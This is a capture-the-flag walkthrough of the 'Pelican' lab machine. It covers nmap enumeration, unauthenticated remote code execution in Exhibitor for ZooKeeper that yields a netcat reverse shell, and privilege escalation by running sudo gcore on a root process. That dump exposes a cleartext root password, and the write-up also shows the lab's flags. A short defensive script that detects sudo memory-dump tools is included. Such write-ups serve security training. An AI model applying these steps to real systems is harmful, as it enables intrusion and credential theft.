Pelican

Enumeration:

Port Scanning:

As always we are going to start with nmap scanning:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pelican]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.222.98
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-02 07:31 +03
Nmap scan report for 192.168.222.98
Host is up, received reset ttl 61 (0.11s latency).                                                                                                                          
Scanned at 2025-10-02 07:31:05 +03 for 367s                                                                                                                                 
Not shown: 65526 closed tcp ports (reset)                                                                                                                                   
PORT      STATE SERVICE     REASON         VERSION                                                                                                                          
22/tcp    open  ssh         syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)                                                                                   
| ssh-hostkey:                                                                                                                                                              
|   2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA)                                                                                                              
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDssyyACw3AHaTatHhBU1VyBRbKOirrDG8M9IjpJPTf/v8mdIqiXk1HsBdoFZcsmWJVV4OXC7GMcHa+s0tZceTmgGf5TpiCB2yXUYPZre183LjJWM6KQMZVI0LHz9Yd3ji2bdD5jjtVxwnjrdx8GlU1THMGbzZivfSsPF18arMIq3ukYBS09Ov1SIKR4DJ7pjtBRutRBZKI/8/H+uB2u47AQRwbWuVaOmtZyDrfvgL/IqAFRQrbeP1VNQAErzHl8wNuk1vR+yROv0j7smTqoqqc8aB751O63gtBdCvKzpigwFDLyxYuzu8dW1Hh6ZQzaQZgWkw6SZeExAijK7yXSU61
|   256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA)                                                                                                             
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNUPmkVV/Q+iD07j1sFmdFWp7yppofTTgfzAhvMkyGPulIdMDbzFgW/pRAq3R3zZV7aEcWAMfFHgdXfj3W4FUuc=          
|   256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519)                                                                                                           
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIPO1eLYoJ0AhVJ5NIDfaSrfUis34Bw5bKMMdFWzHPx0                                                                                          
139/tcp   open  netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)                                                                                      
445/tcp   open  netbios-ssn syn-ack ttl 61 Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)                                                                                   
631/tcp   open  ipp         syn-ack ttl 61 CUPS 2.2                                                                                                                         
| http-methods:                                                                                                                                                             
|   Supported Methods: GET HEAD OPTIONS POST PUT                                                                                                                            
|_  Potentially risky methods: PUT                                                                                                                                          
|_http-title: Forbidden - CUPS v2.2.10                                                                                                                                      
|_http-server-header: CUPS/2.2 IPP/2.1                                                                                                                                      
2181/tcp  open  zookeeper   syn-ack ttl 61 Zookeeper 3.4.6-1569965 (Built on 02/20/2014)                                                                                    
2222/tcp  open  ssh         syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)                                                                                   
| ssh-hostkey:                                                                                                                                                              
|   2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA)                                                                                                              
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDssyyACw3AHaTatHhBU1VyBRbKOirrDG8M9IjpJPTf/v8mdIqiXk1HsBdoFZcsmWJVV4OXC7GMcHa+s0tZceTmgGf5TpiCB2yXUYPZre183LjJWM6KQMZVI0LHz9Yd3ji2bdD5jjtVxwnjrdx8GlU1THMGbzZivfSsPF18arMIq3ukYBS09Ov1SIKR4DJ7pjtBRutRBZKI/8/H+uB2u47AQRwbWuVaOmtZyDrfvgL/IqAFRQrbeP1VNQAErzHl8wNuk1vR+yROv0j7smTqoqqc8aB751O63gtBdCvKzpigwFDLyxYuzu8dW1Hh6ZQzaQZgWkw6SZeExAijK7yXSU61
|   256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA)                                                                                                             
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNUPmkVV/Q+iD07j1sFmdFWp7yppofTTgfzAhvMkyGPulIdMDbzFgW/pRAq3R3zZV7aEcWAMfFHgdXfj3W4FUuc=
|   256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIPO1eLYoJ0AhVJ5NIDfaSrfUis34Bw5bKMMdFWzHPx0
8080/tcp  open  http        syn-ack ttl 61 Jetty 1.0
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(1.0)
8081/tcp  open  http        syn-ack ttl 61 nginx 1.14.2
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://192.168.222.98:8080/exhibitor/v1/ui/index.html
|_http-server-header: nginx/1.14.2
46295/tcp open  java-rmi    syn-ack ttl 61 Java RMI
Service Info: Host: PELICAN; OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have Samba on port 445, SSH on ports 22 and 2222, Java RMI on port 46295, and multiple web servers on different ports.

Inspect them one by one:

I skipped playing with it to try to find any other low-hanging fruit on the other applications.

Also nothing here.

I searched with searchsploit for vulnerabilities related to the running services and their versions, but nothing really interesting came up.

HTTP (8080):

We have Exhibitor for ZooKeeper running on port 8080:

Exploitation:

Reverse shell as charles:

I searched online for any public exploits.

We will find that it is vulnerable to RCE.

There is no authentication in front of it to at least limit the exposure, and it accepts user input without any sanitization in the java.env script field of the application.

We can use this script to help us exploit the vulnerability:

Or we can exploit it ourselves:

We will navigate to config, and we will find the desired field:

We will tick the Editing toggle so the fields become editable, and I will add an nc reverse shell:

Then click on commit:

Click on all at once:

Before we click ok, we need to start our netcat listener:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pelican]
└─$ nc -nlvp 1337
listening on [any] 1337 ...

Then click ok.

We will get a reverse shell:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pelican]
└─$ nc -nlvp 1337
listening on [any] 1337 ...
connect to [192.168.45.186] from (UNKNOWN) [192.168.222.98] 43428
id
uid=1000(charles) gid=1000(charles) groups=1000(charles)

Stabilize the shell so we can use interactive commands such as sudo:

which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
charles@pelican:/opt/zookeeper$ export TERM=xterm
export TERM=xterm
charles@pelican:/opt/zookeeper$ ^Z
zsh: suspended  nc -nlvp 1337

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pelican]
└─$ stty raw -echo ; fg
[1]  + continued  nc -nlvp 1337

charles@pelican:/opt/zookeeper$ stty rows 43 cols 172

Privilege Escalation:

After some enumeration, we find that we can run a binary as root through sudo:

charles@pelican:/$ sudo -l
Matching Defaults entries for charles on pelican:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on pelican:
    (ALL) NOPASSWD: /usr/bin/gcore

Searching online to understand what this tool does:

So with this tool we can dump the memory of a running process to a core file.

Search for any interesting process:

charles@pelican:/$ ps -ef
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 01:13 ?        00:00:00 /sbin/init
root         2     0  0 01:13 ?        00:00:00 [kthreadd]
<snipped>
root       483     1  0 01:13 ?        00:00:00 /usr/sbin/cups-browsed
root       490     1  0 01:13 ?        00:00:00 /usr/bin/password-store
root       491     1  0 01:13 ?        00:00:00 /usr/lib/policykit-1/polkitd --no-debug

We will find this weird program password-store running as the root user.

It seems to be storing credentials in some way.

Let's attempt to dump it using gcore:

charles@pelican:/$ sudo gcore
usage:  gcore [-a] [-o filename] pid

We can output the result to a file:

charles@pelican:/zookeeper/data$ sudo gcore -o password-store 490
0x00007fec7ea386f4 in __GI___nanosleep (requested_time=requested_time@entry=0x7ffd84db2450, remaining=remaining@entry=0x7ffd84db2450) at ../sysdeps/unix/sysv/linux/nanosleep.c:28
28      ../sysdeps/unix/sysv/linux/nanosleep.c: No such file or directory.
Saved corefile password-store.490
[Inferior 1 (process 490) detached]
charles@pelican:/zookeeper/data$ ls -la
total 368
drwxr-xr-x 3 charles charles   4096 Oct  2 02:02 .
drwxr-xr-x 3 charles charles   4096 Sep 10  2020 ..
-rw-r--r-- 1 charles charles      2 Oct  2 01:38 myid
-rw-r--r-- 1 root    root    354448 Oct  2 02:02 password-store.490
drwxr-xr-x 2 charles charles   4096 Sep 10  2020 version-2
-rw-r--r-- 1 charles charles      5 Oct  2 01:38 zookeeper_server.pid

We dumped it successfully.
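From the defender's side, this whole step leaves a clear trace: sudo logs every invocation, including the target process PID. The following is an added example (not part of the original writeup) that parses auth.log-style sudo entries and flags memory-dumping tools such as gcore being run as root; the log lines are constructed for illustration.

```python
"""Flag sudo invocations of process-memory-dumping tools in syslog lines.

Added example for this writeup; the SAMPLE_LOG entries are constructed.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Binaries that, when permitted via sudo, let a user read another process's memory.
MEMORY_DUMP_TOOLS = {"gcore", "gdb", "strace", "ltrace"}

# sudo's standard syslog format:
#   sudo:  <user> : TTY=<tty> ; PWD=<dir> ; USER=<target> ; COMMAND=<cmd>
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s*:\s*(?:TTY=(?P<tty>\S+)\s*;\s*)?"
    r"PWD=(?P<pwd>\S+)\s*;\s*USER=(?P<target>\S+)\s*;\s*COMMAND=(?P<cmd>.*)$"
)


@dataclass
class Finding:
    user: str
    target: str
    tool: str
    pid: Optional[str]
    command: str


def analyze_sudo_log(lines: List[str]) -> List[Finding]:
    """Return one Finding per sudo command that invokes a memory-dumping tool."""
    findings = []
    for line in lines:
        m = SUDO_RE.search(line)
        if not m:
            continue  # pam_unix session lines and non-sudo entries do not match
        cmd = m.group("cmd").strip()
        argv = cmd.split()
        tool = argv[0].rsplit("/", 1)[-1]  # strip the directory part of the binary
        if tool not in MEMORY_DUMP_TOOLS:
            continue
        # gcore takes the PID as its last argument; gdb/strace attach with -p <pid>.
        pid = None
        if tool == "gcore" and argv[-1].isdigit():
            pid = argv[-1]
        elif "-p" in argv and argv.index("-p") + 1 < len(argv):
            pid = argv[argv.index("-p") + 1]
        findings.append(Finding(m.group("user"), m.group("target"), tool, pid, cmd))
    return findings


# Constructed sample entries mirroring the commands run on this box.
SAMPLE_LOG = [
    "Oct  2 01:40:03 pelican sudo:  charles : TTY=pts/0 ; PWD=/ ; USER=root ; COMMAND=list",
    "Oct  2 02:02:11 pelican sudo:  charles : TTY=pts/0 ; PWD=/zookeeper/data ; USER=root ; COMMAND=/usr/bin/gcore -o password-store 490",
    "Oct  2 02:02:11 pelican sudo: pam_unix(sudo:session): session opened for user root by (uid=0)",
    "Oct  2 02:05:44 pelican sudo:  admin : TTY=pts/1 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/bin/apt update",
]

if __name__ == "__main__":
    for f in analyze_sudo_log(SAMPLE_LOG):
        print(f"ALERT: {f.user} ran {f.tool} as {f.target} against PID {f.pid}: {f.command}")
```

Pairing the flagged PID with a process inventory tells you which service's memory was dumped; in a real environment the fix is to remove gcore (and gdb) from NOPASSWD sudoers rather than to detect after the fact.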

We can confirm that this is an ELF core file of the binary:

charles@pelican:/zookeeper/data$ file password-store.490 
password-store.490: ELF 64-bit LSB core file, x86-64, version 1 (SYSV), SVR4-style, from '/usr/bin/password-store', real uid: 0, effective uid: 0, real gid: 0, effective gid: 0, execfn: '/usr/bin/password-store', platform: 'x86_64'

Check what it contains using strings:

charles@pelican:/zookeeper/data$ strings password-store.490 | less
    <snipped>
    /lib/x86_64-linux-gnu/libc.so.6
    /usr/bin/passwor
    ////////////////
    /usr/bin/passwor
    ////////////////
    001 Password: root:
    ClogKingpinInning731
    x86_64
    /usr/bin/password-store
    HOME=/root
    LOGNAME=root
    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
    LANG=en_US.UTF-8
    SHELL=/bin/sh
    PWD=/root
    /usr/bin/password-store    

We find a password; let's check whether it is still valid:

charles@pelican:/zookeeper/data$ su root         
Password: ClogKingpinInning731
root@pelican:/zookeeper/data#

We rooted this box.

Get the flags:

root@pelican:~# cat proof.txt
b8e860dceda73067ea8ec1b9297c314c
root@pelican:~# cat /home/charles/local.txt  
8f2ee45cd931ba726fd8e0c8b2d4f2e0
